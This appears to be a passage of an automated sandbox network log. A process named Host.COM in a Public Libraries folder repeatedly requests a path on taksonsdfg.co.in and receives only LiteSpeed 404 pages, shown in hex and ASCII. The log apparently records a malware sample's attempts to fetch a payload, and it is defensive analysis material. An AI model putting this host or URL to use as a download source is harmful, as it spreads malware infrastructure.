                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:12 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    101192.168.2.450206108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:13 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:14 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:13 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:14 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:14 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    102192.168.2.450208108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:14 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:15 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:14 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:15 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:15 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    103192.168.2.450210108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:15 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:16 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:16 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:16 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:16 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    104192.168.2.450212108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:17 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:17 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:17 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:17 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:17 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    105192.168.2.450214108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:18 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:18 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:18 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:18 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:18 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    106192.168.2.450216108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:19 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:19 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:19 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:19 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:19 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    107192.168.2.450218108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:20 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:20 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:20 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:20 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:20 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
